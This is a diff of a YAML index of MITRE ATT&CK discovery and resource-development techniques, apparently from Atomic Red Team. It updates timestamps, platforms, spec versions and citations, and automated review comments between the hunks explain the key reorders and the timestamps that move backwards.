+ An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Entra ID, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
- Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
+ Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Microsoft Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
For example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)
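Review bot: the second paragraph now says 'Microsoft Graph API' while the citation on the same line is still (Citation: Azure AD Graph API). That matches upstream ATT&CK wording, so keep the key, but check that T1526 still carries an external_references entry whose source_name is exactly 'Azure AD Graph API', or the citation will not resolve. The 'Azure AD' to 'Entra ID' change in the first paragraph is text-only and needs no other follow-up.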
@@ -62344,10 +63031,12 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Suzy Schapperle - Microsoft Azure Red Team
- Praetorian
- Thanabodi Phrakhun, I-SECURE
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Cloud service discovery techniques will likely occur throughout an operation where an adversary is targeting cloud-based systems and services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
@@ -62356,15 +63045,16 @@ discovery:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Cloud Service: Cloud Service Enumeration'
+ - 'Logon Session: Logon Session Creation'
type: attack-pattern
id: attack-pattern--e24fcba8-2557-4442-a139-1ee2f2e784db
created: '2019-08-30T13:01:10.120Z'
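Review bot: the platform list for T1526 drops Azure AD, Office 365 and Google Workspace in favour of 'Office Suite' and 'Identity Provider', bumps x_mitre_version 1.3 to 1.4, and adds the 'Logon Session: Logon Session Creation' data source. Any index that is derived from x_mitre_platforms should be regenerated in the same change so platform-based lookups stay consistent with this object. The x_mitre_modified_by_ref added here is the same key removed further down in this object, so that part is a reorder, not a new value.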
@@ -62392,9 +63082,6 @@ discovery:
url: https://github.com/RhinoSecurityLabs/pacu
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1526
atomic_tests: []
T1018:
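Review bot: the x_mitre_attack_spec_version 3.1.0 and x_mitre_modified_by_ref deleted here were already re-added higher in the same T1526 object in the two preceding hunks (as 3.2.0, and unchanged, respectively), so this is a key reorder plus a spec-version bump rather than a loss of fields; the only value that actually disappears from T1526 is spec_version '2.1'.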
@@ -62469,7 +63156,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1018
atomic_tests:
- name: Remote System Discovery - arp nix
@@ -62672,7 +63358,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1046
atomic_tests:
- name: Port Scan
@@ -62799,12 +63484,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1518
atomic_tests: []
T1538:
technique:
- modified: '2024-04-19T04:25:33.300Z'
+ modified: '2024-10-15T15:51:56.279Z'
name: Cloud Service Dashboard
description: |-
An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports.(Citation: Google Command Center Dashboard)
@@ -62825,12 +63509,11 @@ discovery:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_platforms:
- - Azure AD
- - Office 365
- IaaS
- - Google Workspace
- SaaS
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -62855,7 +63538,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1622:
technique:
@@ -62910,7 +63592,7 @@ discovery:
Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as IsDebuggerPresent()
and NtQueryInformationProcess()
, or manually checking the BeingDebugged
flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as OutputDebugStringW()
.(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-16T15:05:55.918Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Debugger Evasion
x_mitre_detection: |-
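Review bot: the modified timestamp for T1622 moves backwards, from 2022-05-11T14:00:00.188Z to 2022-04-16T15:05:55.918Z. The old value shares the 14:00:00.188Z time-of-day with the modified values replaced on T1614 above and on several resource-development sub-techniques below, which looks like a bulk-stamped placeholder, so the earlier, finer-grained value is plausibly the true upstream timestamp; confirm against the ATT&CK STIX source and say so in the commit message, because consumers that sort or diff by modified will see these objects regress.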
@@ -62930,7 +63612,6 @@ discovery:
- 'Command: Command Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1622
atomic_tests: []
T1124:
@@ -63033,7 +63714,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1124
atomic_tests:
- name: System Time Discovery in FreeBSD/macOS
@@ -63051,7 +63731,7 @@ discovery:
resource-development:
T1583:
technique:
- modified: '2024-02-28T21:13:02.648Z'
+ modified: '2024-10-16T20:03:59.884Z'
name: Acquire Infrastructure
description: |-
Adversaries may buy, lease, rent, or obtain infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Some infrastructure providers offer free trial periods, enabling infrastructure acquisition at limited to no cost.(Citation: Free Trial PurpleUrchin) Additionally, botnets are available for rent or purchase.
@@ -63062,7 +63742,7 @@ resource-development:
phase_name: resource-development
x_mitre_contributors:
- Shailesh Tiwary (Indian Army)
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: "Consider use of services that may aid in tracking of newly
acquired infrastructure, such as WHOIS databases for domain registration information.
@@ -63133,29 +63813,28 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.007:
technique:
- modified: '2022-10-20T21:20:22.578Z'
+ modified: '2024-07-01T20:24:16.562Z'
name: Serverless
description: |-
- Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.
+ Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.
- Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)
+ Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector)(Citation: GWS Apps Script Abuse 2021) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers - making it easier to [Hide Infrastructure](https://attack.mitre.org/techniques/T1665).(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
- x_mitre_detection: ''
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
+ x_mitre_contributors:
+ - Awake Security
x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Awake Security
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Internet Scan: Response Content'
type: attack-pattern
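Review bot: beyond the key reorder (x_mitre_detection, x_mitre_platforms, x_mitre_is_subtechnique and x_mitre_contributors moved, values unchanged), the substantive changes are the new '(Citation: GWS Apps Script Abuse 2021)' and the added 'making it easier to [Hide Infrastructure](https://attack.mitre.org/techniques/T1665)' clause, with x_mitre_version 1.0 to 1.1; the new citation must resolve to an external_references entry with that exact source_name in this object. The ' - ' used as a dash in 'providers - making' is upstream wording and should stay.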
@@ -63179,15 +63858,18 @@ resource-development:
description: Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses
Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.
url: https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/
+ - source_name: GWS Apps Script Abuse 2021
+ description: Sergiu Gatlan. (2021, February 18). Hackers abuse Google Apps
+ Script to steal credit cards, bypass CSP. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/#google_vignette
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.007:
technique:
- modified: '2024-04-15T23:49:14.558Z'
+ modified: '2024-09-12T19:18:36.583Z'
name: Artificial Intelligence
description: |
Adversaries may obtain access to generative artificial intelligence tools, such as large language models (LLMs), to aid various techniques during targeting. These tools may be used to inform, bolster, and enable a variety of malicious tasks including conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043), creating basic scripts, assisting social engineering, and even developing payloads.(Citation: MSFT-AI)
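Review bot: the new 'GWS Apps Script Abuse 2021' reference URL ends in '#google_vignette', a fragment added by the publisher's ad overlay rather than part of the article address. It mirrors upstream ATT&CK, so raise it upstream instead of hand-editing a generated file, but be aware that any URL-equality check against other references to the same article will not match until it is cleaned there.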
@@ -63219,17 +63901,16 @@ resource-development:
url: https://www.microsoft.com/en-us/security/blog/2024/02/14/staying-ahead-of-threat-actors-in-the-age-of-ai/
- source_name: OpenAI-CTI
description: OpenAI. (2024, February 14). Disrupting malicious uses of AI
- by state-affiliated threat actors. Retrieved March 11, 2024.
- url: https://openai.com/blog/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors
+ by state-affiliated threat actors. Retrieved September 12, 2024.
+ url: https://openai.com/index/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1584.008:
technique:
- modified: '2024-04-19T12:24:40.659Z'
+ modified: '2024-10-15T15:10:59.530Z'
name: Network Devices
description: |-
Adversaries may compromise third-party network devices that can be used during targeting. Network devices, such as small office/home office (SOHO) routers, may be compromised where the adversary's ultimate goal is not [Initial Access](https://attack.mitre.org/tactics/TA0001) to that environment -- instead leveraging these devices to support additional targeting.
@@ -63282,11 +63963,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.008:
technique:
- modified: '2023-04-17T15:32:39.470Z'
+ modified: '2024-10-16T20:10:08.246Z'
name: Malvertising
description: "Adversaries may purchase online advertisements that can be abused
to distribute malware to victims. Ads can be purchased to plant as well as
@@ -63322,7 +64002,7 @@ resource-development:
phase_name: resource-development
x_mitre_contributors:
- Tom Hegel
- - Goldstein Menachem
+ - Menachem Goldstein
- Hiroki Nagahama, NEC Corporation
- Manikantan Srinivasan, NEC Corporation India
- Pooja Natarajan, NEC Corporation India
@@ -63371,43 +64051,12 @@ resource-development:
url: https://labs.guard.io/masquerads-googles-ad-words-massively-abused-by-threat-actors-targeting-organizations-gpus-42ae73ee8a1e
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.004:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421
- type: attack-pattern
- created: '2020-10-01T02:14:18.044Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1588.004
- url: https://attack.mitre.org/techniques/T1588/004
- - description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
- Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
- source_name: DiginotarCompromise
- url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
- - source_name: Let's Encrypt FAQ
- url: https://letsencrypt.org/docs/faq/
- description: Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved
- October 15, 2020.
- - source_name: Splunk Kovar Certificates 2017
- url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
- description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
- Certificates. Retrieved October 16, 2020.
- - source_name: Recorded Future Beacon Certificates
- url: https://www.recordedfuture.com/cobalt-strike-servers/
- description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
- Rogue Cobalt Strike Servers. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-16T16:19:41.567Z'
name: Digital Certificates
description: |-
Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.
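Review bot: every field deleted at the top of T1588.004 here (x_mitre_platforms, x_mitre_domains, object_marking_refs, id, type, created, created_by_ref and all five external_references) is re-added, reordered, at the bottom of the same object in the next hunk, so the two hunks should be read together; the only deletion in this hunk that is not restored is the old modified timestamp, which is replaced by 2024-09-16T16:19:41.567Z.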
@@ -63420,18 +64069,49 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_deprecated: false
x_mitre_detection: |-
Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Certificate: Certificate Registration'
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421
+ created: '2020-10-01T02:14:18.044Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1588/004
+ external_id: T1588.004
+ - source_name: DiginotarCompromise
+ description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
+ Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
+ url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
+ - source_name: Recorded Future Beacon Certificates
+ description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
+ Rogue Cobalt Strike Servers. Retrieved September 16, 2024.
+ url: https://www.recordedfuture.com/research/cobalt-strike-servers
+ - source_name: Splunk Kovar Certificates 2017
+ description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+ Certificates. Retrieved October 16, 2020.
+ url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+ - source_name: Let's Encrypt FAQ
+ description: Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved
+ October 15, 2020.
+ url: https://letsencrypt.org/docs/faq/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1583.002:
technique:
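Review bot: within the re-added block the substantive changes are the Recorded Future URL (/cobalt-strike-servers/ to /research/cobalt-strike-servers, with the retrieved date moved to September 16, 2024), x_mitre_attack_spec_version 2.1.0 to 3.2.0, and the new `revoked: false` and `x_mitre_deprecated: false` flags; everything else is the same content in a different key order. Leaving x_mitre_version at '1.2' is correct, since the technique text itself is unchanged. The DiginotarCompromise entry now lists source_name before description, matching the other entries, which is an improvement.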
@@ -63453,7 +64133,7 @@ resource-development:
url: https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/
description: 'Hinchliffe, A. (2019, March 15). DNS Tunneling: how DNS can
be (ab)used by malicious actors. Retrieved October 3, 2020.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T02:49:49.702Z'
name: DNS Server
description: |-
Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.
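Review bot: another backwards modified timestamp (2022-04-25T14:00:00.188Z to 2021-04-15T02:49:49.702Z) for T1583.002, and the same pattern repeats for the remaining resource-development sub-techniques below. The same check applies as for T1622: verify the earlier values against upstream and document the reason in the commit message.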
@@ -63469,8 +64149,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1587.003:
technique:
@@ -63492,7 +64170,7 @@ resource-development:
url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
Certificates. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-16T17:32:34.604Z'
name: Digital Certificates
description: |-
Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).
@@ -63512,8 +64190,6 @@ resource-development:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1587.001:
technique:
@@ -63552,7 +64228,7 @@ resource-development:
description: 'FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define
a Russian Cyber Threat Group. Retrieved September 17, 2015.'
url: https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-01-14T17:14:27.890Z'
name: Malware
description: |-
Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB)
@@ -63573,8 +64249,6 @@ resource-development:
x_mitre_data_sources:
- 'Malware Repository: Malware Content'
- 'Malware Repository: Malware Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1586.001:
technique:
@@ -63604,7 +64278,7 @@ resource-development:
description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved
March 6, 2017.
url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-16T17:15:12.169Z'
name: Social Media Accounts
description: "Adversaries may compromise social media accounts that can be used
during targeting. For operations incorporating social engineering, the utilization
@@ -63641,8 +64315,6 @@ resource-development:
x_mitre_data_sources:
- 'Persona: Social Media'
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1588.006:
technique:
@@ -63664,7 +64336,7 @@ resource-development:
url: https://nvd.nist.gov/
description: National Vulnerability Database. (n.d.). National Vulnerability
Database. Retrieved October 15, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:16:32.119Z'
name: Vulnerabilities
description: |-
Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.(Citation: National Vulnerability Database)
@@ -63686,8 +64358,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1583.005:
technique:
@@ -63724,7 +64394,7 @@ resource-development:
description: Brian Krebs. (2016, October 27). Are the Days of “Booter” Services
Numbered?. Retrieved May 15, 2017.
url: https://krebsonsecurity.com/2016/10/are-the-days-of-booter-services-numbered/
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T02:49:14.664Z'
name: Botnet
description: 'Adversaries may buy, lease, or rent a network of compromised systems that
can be used during targeting. A botnet is a network of compromised systems
@@ -63746,8 +64416,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1608.004:
technique:
@@ -63809,7 +64477,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1587.002:
technique:
@@ -63831,7 +64498,7 @@ resource-development:
description: Wikipedia. (2015, November 10). Code Signing. Retrieved March
31, 2016.
source_name: Wikipedia Code Signing
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:07:08.549Z'
name: Code Signing Certificates
description: |-
Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
@@ -63849,8 +64516,6 @@ resource-development:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Malware Repository: Malware Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1584.003:
technique:
@@ -63885,7 +64550,7 @@ resource-development:
url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
Shodan. Retrieved October 12, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T15:59:02.770Z'
name: Virtual Private Server
description: |-
Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.(Citation: NSA NCSC Turla OilRig)
@@ -63904,33 +64569,31 @@ resource-development:
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- 'Internet Scan: Response Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1586.003:
technique:
- modified: '2022-10-21T14:21:57.991Z'
+ modified: '2024-10-16T21:26:36.312Z'
name: Cloud Accounts
description: |-
- Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
